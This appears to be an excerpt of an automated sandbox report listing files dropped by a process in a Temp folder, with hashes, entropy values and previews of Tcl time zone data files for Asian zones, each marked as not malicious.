                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Novokuznetsk) {. {-9223372036854775808 20928 0 LMT}. {-1441259328 21600 0 +06}. {-1247551200 25200 0 +08}. {354906000 28800 1 +08}. {370713600 25200 0 +07}. {386442000 28800 1 +08}. {402249600 25200 0 +07}. {417978000 28800 1 +08}. {433785600 25200 0 +07}. {449600400 28800 1 +08}. {465332400 25200 0 +07}. {481057200 28800 1 +08}. {496782000 25200 0 +07}. {512506800 28800 1 +08}. {528231600 25200 0 +07}. {543956400 28800 1 +08}. {559681200 25200 0 +07}. {575406000 28800 1 +08}. {591130800 25200 0 +07}. {606855600 28800 1 +08}. {622580400 25200 0 +07}. {638305200 28800 1 +08}. {654634800 25200 0 +07}. {670359600 21600 0 +07}. {670363200 25200 1 +07}. {686088000 21600 0 +06}. {695764800 25200 0 +08}. {701809200 28800 1 +08}. {717534000 25200 0 +07}. {733258800 28800 1 +08}. {748983600 25200 0 +07}. {764708400 28800 1 +08}. {780433
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2048
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.623418616375595
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:5HNi17A9/IJ4vQayW+dRvV8YzXJIq79Af3AuyqM7F/zTXUVtrBju6waUwcTLTTWF:6jFRRCfQuozB7TQt
                                                                                                                                                                                                                                                                                                                                MD5:46E5FB7DEB8041BC9A2ADC83728944A7
                                                                                                                                                                                                                                                                                                                                SHA1:B5826E206EAA3E8789A0F9E4B7511CEBFD1B6764
                                                                                                                                                                                                                                                                                                                                SHA-256:C241F732B9731FA141B03FF1F990556C9BF14A1B21C9757C7FF75E688908B8A0
                                                                                                                                                                                                                                                                                                                                SHA-512:42B6BEEE9C15CB59C010013FE0673CB0DF46CD0AC388DF7D57DCCD54482C950F2935F8A8D7DC68CFFD184B698283589134901C9C597970D95C5B608CD160AF70
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Novosibirsk) {. {-9223372036854775808 19900 0 LMT}. {-1579476700 21600 0 +06}. {-1247551200 25200 0 +08}. {354906000 28800 1 +08}. {370713600 25200 0 +07}. {386442000 28800 1 +08}. {402249600 25200 0 +07}. {417978000 28800 1 +08}. {433785600 25200 0 +07}. {449600400 28800 1 +08}. {465332400 25200 0 +07}. {481057200 28800 1 +08}. {496782000 25200 0 +07}. {512506800 28800 1 +08}. {528231600 25200 0 +07}. {543956400 28800 1 +08}. {559681200 25200 0 +07}. {575406000 28800 1 +08}. {591130800 25200 0 +07}. {606855600 28800 1 +08}. {622580400 25200 0 +07}. {638305200 28800 1 +08}. {654634800 25200 0 +07}. {670359600 21600 0 +07}. {670363200 25200 1 +07}. {686088000 21600 0 +06}. {695764800 25200 0 +08}. {701809200 28800 1 +08}. {717534000 25200 0 +07}. {733258800 28800 1 +08}. {738090000 25200 0 +07}. {748987200 21600 0 +06}. {7647120
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1984
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.5988580260925795
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:5aQyvONnwqeDinDL+8kSViqS6A+VzTXUVtrBju6waUwcTLTTW59OxJCT:IkHdiq5BzB7TQJ
                                                                                                                                                                                                                                                                                                                                MD5:54E1F8C11C9CF4BF1DBCABF4AF31B7D4
                                                                                                                                                                                                                                                                                                                                SHA1:3C428E50A02941B19AF2A2F1EA02763AA2C1A846
                                                                                                                                                                                                                                                                                                                                SHA-256:5B9E95C813A184C969CC9808E136AD66C1231A55E66D4EE817BD2E85751C4EE9
                                                                                                                                                                                                                                                                                                                                SHA-512:83DBFCC089AC902609FFFCA8E675430B9BF1EA452626E83173F83317884B6AC2620CE8AA96488ACF13445D9D1D4776EB908232BD8205B8F4F9B034A68864C9A9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Omsk) {. {-9223372036854775808 17610 0 LMT}. {-1582088010 18000 0 +05}. {-1247547600 21600 0 +07}. {354909600 25200 1 +07}. {370717200 21600 0 +06}. {386445600 25200 1 +07}. {402253200 21600 0 +06}. {417981600 25200 1 +07}. {433789200 21600 0 +06}. {449604000 25200 1 +07}. {465336000 21600 0 +06}. {481060800 25200 1 +07}. {496785600 21600 0 +06}. {512510400 25200 1 +07}. {528235200 21600 0 +06}. {543960000 25200 1 +07}. {559684800 21600 0 +06}. {575409600 25200 1 +07}. {591134400 21600 0 +06}. {606859200 25200 1 +07}. {622584000 21600 0 +06}. {638308800 25200 1 +07}. {654638400 21600 0 +06}. {670363200 18000 0 +06}. {670366800 21600 1 +06}. {686091600 18000 0 +05}. {695768400 21600 0 +07}. {701812800 25200 1 +07}. {717537600 21600 0 +06}. {733262400 25200 1 +07}. {748987200 21600 0 +06}. {764712000 25200 1 +07}. {780436800 2160
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1606
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6164715895962876
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQ3eHykSYlS7hhmSQcwqSlhJS9yiIoSBHrSLUSIYdDSVbt8i9E603CRWeZunSbOi:5FkXlkhs7bqIwIoMpqDPiBRBlL
                                                                                                                                                                                                                                                                                                                                MD5:38914E248C13912E33187496C5AD9691
                                                                                                                                                                                                                                                                                                                                SHA1:94C3711FC5EED22FE1929F2250208AC53DB175AC
                                                                                                                                                                                                                                                                                                                                SHA-256:581AF958787971BE487B37C2D2534E58FFA085AFD0D9F0E12E0EEFF03F476E53
                                                                                                                                                                                                                                                                                                                                SHA-512:8C7F21C8FCE2614181A998774E7038BAC483E502C3C31EDB0F4954E1424A0C16AD7DC5003E9533BB47CA2C06DD027E989BD696B2A74A23F686F74B8C9650BAE6
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Oral) {. {-9223372036854775808 12324 0 LMT}. {-1441164324 10800 0 +03}. {-1247540400 18000 0 +05}. {354913200 21600 1 +06}. {370720800 21600 0 +06}. {386445600 18000 0 +05}. {386449200 21600 1 +05}. {402256800 18000 0 +05}. {417985200 21600 1 +05}. {433792800 18000 0 +05}. {449607600 21600 1 +05}. {465339600 18000 0 +05}. {481064400 21600 1 +05}. {496789200 18000 0 +05}. {512514000 21600 1 +05}. {528238800 18000 0 +05}. {543963600 21600 1 +05}. {559688400 18000 0 +05}. {575413200 21600 1 +05}. {591138000 18000 0 +05}. {606862800 14400 0 +04}. {606866400 18000 1 +04}. {622591200 14400 0 +04}. {638316000 18000 1 +04}. {654645600 14400 0 +04}. {670370400 18000 1 +04}. {686095200 14400 0 +04}. {701816400 14400 0 +04}. {701820000 18000 1 +04}. {717544800 14400 0 +04}. {733269600 18000 1 +04}. {748994400 14400 0 +04}. {764719200 1800
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):175
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.911861786274714
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8VLYO5YFwVAIgN8ELYOAvN2WFKeHKLNM0WFKELYOun:SlSWB9IZaM3y1LewVAIgKELUvN2wKTNp
                                                                                                                                                                                                                                                                                                                                MD5:754059D3B44B7D60FB3BBFC97782C6CF
                                                                                                                                                                                                                                                                                                                                SHA1:6AE931805E6A42836D65E4EBC76A58BBFB3DCAF4
                                                                                                                                                                                                                                                                                                                                SHA-256:2C2DBD952FDA5CC042073B538C240B11C5C8E614DD4A697E1AA4C80E458575D0
                                                                                                                                                                                                                                                                                                                                SHA-512:B5AA4B51699EEAE0D9F91BBAB5B682BD84537C4E2CCE282613E1FFA1DDBE562CA487FB2F8CD006EE9DBC9EFAEFA587EC9998F0364E5C932CDB42C14319328D46
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Bangkok)]} {. LoadTimeZoneFile Asia/Bangkok.}.set TZData(:Asia/Phnom_Penh) $TZData(:Asia/Bangkok).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):356
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.428640713376822
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X52wKT5wFJm2OHUed9xMkc5k/MVSSmCLkvScCAdMVSSo1CkDF4mMVSSmT+:MBp52L5wFJmdHFxbc5kMxvLkHCQMxoRg
                                                                                                                                                                                                                                                                                                                                MD5:81C643629BB417E38A5514BBEFEF55C8
                                                                                                                                                                                                                                                                                                                                SHA1:7D91E7F00A1A0B795EF3FDD1B3DD052EA2F6122C
                                                                                                                                                                                                                                                                                                                                SHA-256:998DFACE4BEE8A925E88D779D6C9FB9F9010BDB68010A9CCBC0B97BB5C49D452
                                                                                                                                                                                                                                                                                                                                SHA-512:1291521B74984EC03557C4DC492DB4DD1312626F61612C1F143BA482E2C32CD331647D86507D3B3721D148B2ED3CED6678123BD801DAA6B4F2D9A0C07B90575F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Pontianak) {. {-9223372036854775808 26240 0 LMT}. {-1946186240 26240 0 PMT}. {-1172906240 27000 0 +0730}. {-881220600 32400 0 +09}. {-766054800 27000 0 +0730}. {-683883000 28800 0 +08}. {-620812800 27000 0 +0730}. {-189415800 28800 0 WITA}. {567964800 25200 0 WIB}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):263
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.653238218910832
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X52wK8cE4Lm2OHnNdRw8vm1T0vGLucjv7:MBp520cEWmdHnNLvjuD
                                                                                                                                                                                                                                                                                                                                MD5:96754BB7D98975118E86B539D8F917B4
                                                                                                                                                                                                                                                                                                                                SHA1:5D366D64E08F1E9869EA2E93B5C6C5C0C5E7E3BE
                                                                                                                                                                                                                                                                                                                                SHA-256:10432381A63B2101A1218D357DA2075885F061F3A60BE00A32EED4DF868E5566
                                                                                                                                                                                                                                                                                                                                SHA-512:58BFFF63D40CF899304D69468949B806F00F5F2F2BE47040D5704E8C463D7B502725846933749172AF94CCD0AA894E30AD3154CC953D917AC8040B00D331124E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Pyongyang) {. {-9223372036854775808 30180 0 LMT}. {-1948782180 30600 0 KST}. {-1830414600 32400 0 JST}. {-768646800 32400 0 KST}. {1439564400 30600 0 KST}. {1525446000 32400 0 KST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):169
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.800949065138005
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx52WFKK3vFSXGm2OHPFV4YvUQKb3VvVsRYvFF5FRVGsWYAvn:SlSWB9X52wKK3vTm2OHoYRcvSQFF5FR4
                                                                                                                                                                                                                                                                                                                                MD5:E70F65EBF35BE045F43456A67DEBCD34
                                                                                                                                                                                                                                                                                                                                SHA1:EE5669823D60518D0AAB07A7C539B8089807D589
                                                                                                                                                                                                                                                                                                                                SHA-256:B8E3F98A20BE938B9B1A6CE1CE4218751393B33E933A8F9278AA3EEECB13D2C6
                                                                                                                                                                                                                                                                                                                                SHA-512:9B142D27C92C2478ED086668F8E3DC4BD8E9FDA712D8888469816B4795B5DFDD7F5F22D7BA6A31CA4E32483ABE5A5B4C7CEFC91856B09DDF651E58867FC932C9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Qatar) {. {-9223372036854775808 12368 0 LMT}. {-1577935568 14400 0 +04}. {76190400 10800 0 +03}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1583
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.64822959139346
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:5UXlkhs7bqIwIoMpqDS7oXbPw+bBijbbyzIr1jA:ICOgZbWM
                                                                                                                                                                                                                                                                                                                                MD5:E79902C294AEFC5A3A3DCFFF4142E54F
                                                                                                                                                                                                                                                                                                                                SHA1:8F9E8413C8F2D1DCF7DB74BE3AF067CBFEF2E73C
                                                                                                                                                                                                                                                                                                                                SHA-256:4A254C094E4F5955E33C19E01EF2B8D5B70AC0AD08203FD105F475C8F862F28C
                                                                                                                                                                                                                                                                                                                                SHA-512:3283248979FC76BE94D705013728FF206A32B8820D475C4DFC0636D2329E8FA5D251EAE5A21D9A9DC30659A6B567E73A7C614D7DA3F60025BFEA617ACE2EE597
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Qyzylorda) {. {-9223372036854775808 15712 0 LMT}. {-1441167712 14400 0 +04}. {-1247544000 18000 0 +05}. {354913200 21600 1 +06}. {370720800 21600 0 +06}. {386445600 18000 0 +05}. {386449200 21600 1 +05}. {402256800 18000 0 +05}. {417985200 21600 1 +05}. {433792800 18000 0 +05}. {449607600 21600 1 +05}. {465339600 18000 0 +05}. {481064400 21600 1 +05}. {496789200 18000 0 +05}. {512514000 21600 1 +05}. {528238800 18000 0 +05}. {543963600 21600 1 +05}. {559688400 18000 0 +05}. {575413200 21600 1 +05}. {591138000 18000 0 +05}. {606862800 21600 1 +05}. {622587600 18000 0 +05}. {638312400 21600 1 +05}. {654642000 18000 0 +05}. {670366800 14400 0 +04}. {670370400 18000 1 +04}. {701812800 18000 0 +05}. {701816400 21600 1 +05}. {717541200 18000 0 +05}. {733266000 21600 1 +05}. {748990800 18000 0 +05}. {764715600 21600 1 +05}. {780440400
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):169
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.761776859195572
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8nvwFVAIgNnEYO62WFK02KQMFfh4WFKsv:SlSWB9IZaM3yHvwFVAIgZ2wK0GEJ4wKO
                                                                                                                                                                                                                                                                                                                                MD5:6135C39675BB0F7BB94756F2057382CF
                                                                                                                                                                                                                                                                                                                                SHA1:EB2C51837E721776BED5F3F1F4A014BA29DA0282
                                                                                                                                                                                                                                                                                                                                SHA-256:E573ADFBB9935B7D0B56FAE699160226BF3416C50EB63D8EFEB1748C4B13BF91
                                                                                                                                                                                                                                                                                                                                SHA-512:BC1E7C9F1F64FF7D6A50E70E62566F385A923A475E309A321FCC03964350E427A4AEE801A20B3293A289AD67E03C86B59A674F91F34238068DA6C35BBB3B4307
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Yangon)]} {. LoadTimeZoneFile Asia/Yangon.}.set TZData(:Asia/Rangoon) $TZData(:Asia/Yangon).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):142
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.928343799484186
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx52WFK814tXGm2OHFukevSUi9VssWYAvn:SlSWB9X52wK81Hm2OHF7ePi9V1WYAv
                                                                                                                                                                                                                                                                                                                                MD5:76E7F746F8663772A350A2E2C2F680C7
                                                                                                                                                                                                                                                                                                                                SHA1:698E3C80122AC7B9E6EF7A45F87898334A1A622E
                                                                                                                                                                                                                                                                                                                                SHA-256:7D2FAC4F33EE0FA667AF8A2BF8257638A37CE0308038AC02C7B5BE6E1D1E5EDD
                                                                                                                                                                                                                                                                                                                                SHA-512:9B1C326D3B7C89957176540AB4F856780C57C495A44F80D998A4B0C5A10F358C2F727BF160FB49D17C104B4A8EB15AC5431CCB886AC59A92E56C964D757FA3B0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Riyadh) {. {-9223372036854775808 11212 0 LMT}. {-719636812 10800 0 +03}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):183
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.899371908380106
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8I65eVyVAIgN2h659Q2WFKwJ6h4WFK365ev:SlSWB9IZaM3yJAVyVAIgA4s2wKl4wKKK
                                                                                                                                                                                                                                                                                                                                MD5:A978C9AD6320DA94CB15324CA82C7417
                                                                                                                                                                                                                                                                                                                                SHA1:585C232F3FB2693C78C7831C1AF1DC25D6824CA7
                                                                                                                                                                                                                                                                                                                                SHA-256:73E1850BB0827043024EAFA1934190413CB36EA6FE18C90EA86B9DBC1D61EEBF
                                                                                                                                                                                                                                                                                                                                SHA-512:AE48BFB2A348CA992F2BCD6B1AF7495713B0526C326678309133D3271D90600624C096B4B8678AD7ECD19822E3BB24E27D12680FCA7FAA455D3CE324CE0B88ED
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Ho_Chi_Minh)]} {. LoadTimeZoneFile Asia/Ho_Chi_Minh.}.set TZData(:Asia/Saigon) $TZData(:Asia/Ho_Chi_Minh).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2044
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.636696819312369
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:5i1fvBHwRw/P2rFGAlODU9HOUDEChbmAP+:gDtP2rUfDEZDV1ZP+
                                                                                                                                                                                                                                                                                                                                MD5:265EF8FD8FB07585726D3054289A1C48
                                                                                                                                                                                                                                                                                                                                SHA1:DDFB1197C7A7455674AA085A6B8089124EB47689
                                                                                                                                                                                                                                                                                                                                SHA-256:4CCF3795EF0EF42AA09A9225370E8E1537B53A0231363077DAC385F397208669
                                                                                                                                                                                                                                                                                                                                SHA-512:1ACE8C173E87530FCC809814DEA779CB09ED8A277DB3B0519E57727AD3A93F3AFAFAF0F80419A8B6A8FAC1B30600716169BEAE397E34E6BE1A18D0E31DB69B3F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Sakhalin) {. {-9223372036854775808 34248 0 LMT}. {-2031039048 32400 0 +09}. {-768560400 39600 0 +12}. {354891600 43200 1 +12}. {370699200 39600 0 +11}. {386427600 43200 1 +12}. {402235200 39600 0 +11}. {417963600 43200 1 +12}. {433771200 39600 0 +11}. {449586000 43200 1 +12}. {465318000 39600 0 +11}. {481042800 43200 1 +12}. {496767600 39600 0 +11}. {512492400 43200 1 +12}. {528217200 39600 0 +11}. {543942000 43200 1 +12}. {559666800 39600 0 +11}. {575391600 43200 1 +12}. {591116400 39600 0 +11}. {606841200 43200 1 +12}. {622566000 39600 0 +11}. {638290800 43200 1 +12}. {654620400 39600 0 +11}. {670345200 36000 0 +11}. {670348800 39600 1 +11}. {686073600 36000 0 +10}. {695750400 39600 0 +12}. {701794800 43200 1 +12}. {717519600 39600 0 +11}. {733244400 43200 1 +12}. {748969200 39600 0 +11}. {764694000 43200 1 +12}. {780418800 3
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):848
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8621003155318263
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQtleA7NSYlS7hhmSQcwqSlhJS9yiIoSBHrSLUSIYdDS7/S5c3oSATo6SSYL:5hXlkhs7bqIwIoMpqDS7oXjSpL
                                                                                                                                                                                                                                                                                                                                MD5:6E54D9946AC13DD77FDB8EA9C4FBD989
                                                                                                                                                                                                                                                                                                                                SHA1:EF0A4BFD84EC369CB9581D830F20193D73187C0B
                                                                                                                                                                                                                                                                                                                                SHA-256:28A76A0EAF55EEC9FE7BEFF3785FDEF8C3D93AAAA2E15EE37D861E73418AC9E4
                                                                                                                                                                                                                                                                                                                                SHA-512:15522A5B85DCD54DC0143A38799A870268D74C8A26FED44D50A55C536D3738905597AE4F3F2AB767DE73A7EDBAE8FBF467A6014E2001FA03924C3F39E0361F27
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Samarkand) {. {-9223372036854775808 16073 0 LMT}. {-1441168073 14400 0 +04}. {-1247544000 18000 0 +05}. {354913200 21600 1 +06}. {370720800 21600 0 +06}. {386445600 18000 0 +05}. {386449200 21600 1 +05}. {402256800 18000 0 +05}. {417985200 21600 1 +05}. {433792800 18000 0 +05}. {449607600 21600 1 +05}. {465339600 18000 0 +05}. {481064400 21600 1 +05}. {496789200 18000 0 +05}. {512514000 21600 1 +05}. {528238800 18000 0 +05}. {543963600 21600 1 +05}. {559688400 18000 0 +05}. {575413200 21600 1 +05}. {591138000 18000 0 +05}. {606862800 21600 1 +05}. {622587600 18000 0 +05}. {638312400 21600 1 +05}. {654642000 18000 0 +05}. {670366800 21600 1 +05}. {686091600 18000 0 +05}. {694206000 18000 0 +05}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):719
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.129493275264732
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:MBp525mdHjauvWz4aqceOcrIt04CaI8/HUYVfXzQD:cQ5edvWzJnJGIt047I8/Hp/zQD
                                                                                                                                                                                                                                                                                                                                MD5:7F24687F220D3B7F3C08A1F09F86BAEF
                                                                                                                                                                                                                                                                                                                                SHA1:2D96019AE5137935F7A43FCFD229645D656E21AF
                                                                                                                                                                                                                                                                                                                                SHA-256:8DBBFEEDD583DBE60E88E381D511B72DDD7AE93FEB64A2F97D6CDBF6B92A0775
                                                                                                                                                                                                                                                                                                                                SHA-512:BFD955BA4A284D91542D15CAE849C162D1470167D65365FF93B117D7B4361DB314ABEF5448CF5BA382002726D472FA74C3B9DD5B43CD539395FDC8241E4A0248
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Seoul) {. {-9223372036854775808 30472 0 LMT}. {-1948782472 30600 0 KST}. {-1830414600 32400 0 JST}. {-767350800 32400 0 KST}. {-498128400 30600 0 KST}. {-462702600 34200 1 KDT}. {-451733400 30600 0 KST}. {-429784200 34200 1 KDT}. {-418296600 30600 0 KST}. {-399544200 34200 1 KDT}. {-387451800 30600 0 KST}. {-368094600 34200 1 KDT}. {-356002200 30600 0 KST}. {-336645000 34200 1 KDT}. {-324552600 30600 0 KST}. {-305195400 34200 1 KDT}. {-293103000 30600 0 KST}. {-264933000 32400 0 KST}. {547578000 36000 1 KDT}. {560883600 32400 0 KST}. {579027600 36000 1 KDT}. {592333200 32400 0 KST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):887
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.102844989906348
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQ8emvZMwq/Zkq/fYFq/J2Lzq/9mBq/Qq/LPq/Rq/HTq/Pjq/rzq/c2q/uq/4u:5YvZMT/d/fYc/JWG/M4/z/W/o/G/PW/f
                                                                                                                                                                                                                                                                                                                                MD5:D3D88F264E5E44BAA890C19A4C87A24D
                                                                                                                                                                                                                                                                                                                                SHA1:BA2E3F8D69D1092CE925D40FE31BEABA0DC22905
                                                                                                                                                                                                                                                                                                                                SHA-256:90B585115252C37625B6BCDE14708AAE003E2D6F3408D8A9034ABB6FFFD66490
                                                                                                                                                                                                                                                                                                                                SHA-512:14485EEC4C77DA6D7DD813A84F3F5B0DE17AE06C23FBCDB20727376C62D675ED675893B8B9A4DAAA00C21B7550F83593780CA538DB05B4ADDD4604FBCD3B0E51
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Shanghai) {. {-9223372036854775808 29143 0 LMT}. {-2177481943 28800 0 CST}. {-933667200 32400 1 CDT}. {-922093200 28800 0 CST}. {-908870400 32400 1 CDT}. {-888829200 28800 0 CST}. {-881049600 32400 1 CDT}. {-767869200 28800 0 CST}. {-745833600 32400 1 CDT}. {-733827600 28800 0 CST}. {-716889600 32400 1 CDT}. {-699613200 28800 0 CST}. {-683884800 32400 1 CDT}. {-670669200 28800 0 CST}. {-652348800 32400 1 CDT}. {-650016000 28800 0 CST}. {515527200 32400 1 CDT}. {527014800 28800 0 CST}. {545162400 32400 1 CDT}. {558464400 28800 0 CST}. {577216800 32400 1 CDT}. {589914000 28800 0 CST}. {608666400 32400 1 CDT}. {621968400 28800 0 CST}. {640116000 32400 1 CDT}. {653418000 28800 0 CST}. {671565600 32400 1 CDT}. {684867600 28800 0 CST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):359
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.370799489849578
